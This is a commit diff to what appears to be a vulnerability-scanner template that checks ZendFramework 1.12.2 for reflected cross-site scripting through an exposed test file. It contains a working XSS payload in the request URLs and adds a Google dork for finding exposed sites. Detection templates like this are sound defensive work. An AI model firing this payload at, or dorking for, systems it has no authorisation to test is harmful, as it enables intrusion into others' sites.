Update zend-v1-xss.yaml

2022-12-07 19:22:26 +05:30 · 2022-12-07 19:22:26 +05:30 · a033b96ceb
parent f417ca8a2b
commit a033b96ceb
1 changed files with 13 additions and 12 deletions
--- a/vulnerabilities/zend/zend-v1-xss.yaml
+++ b/vulnerabilities/zend/zend-v1-xss.yaml
@ -4,21 +4,22 @@ info:
  name: ZendFramework 1.12.2 - Cross-Site Scripting
  author: c3l3si4n
  severity: medium
-  description: ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
+  description: |
+    ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
  reference:
    - https://twitter.com/c3l3si4n/status/1600035722148212737
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
-    cvss-score: 7.2
-    cwe-id: CWE-79
+  metadata:
+    verified: true
+    google-dork: inurl:"/tests/Zend/Http/"
  tags: zend,zendframework,xss

 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>%20a='test'>"
-      - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)%20a='test'>"
+      - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>"
+      - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)>"

+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
@ -29,11 +30,11 @@ requests:
          - '<img/src=x onerror=alert(document.domain)'
        condition: and

-      - type: status
-        status:
-          - 200
-
      - type: word
        part: header
        words:
-          - "text/html"
+          - text/html
+
+      - type: status
+        status:
+          - 200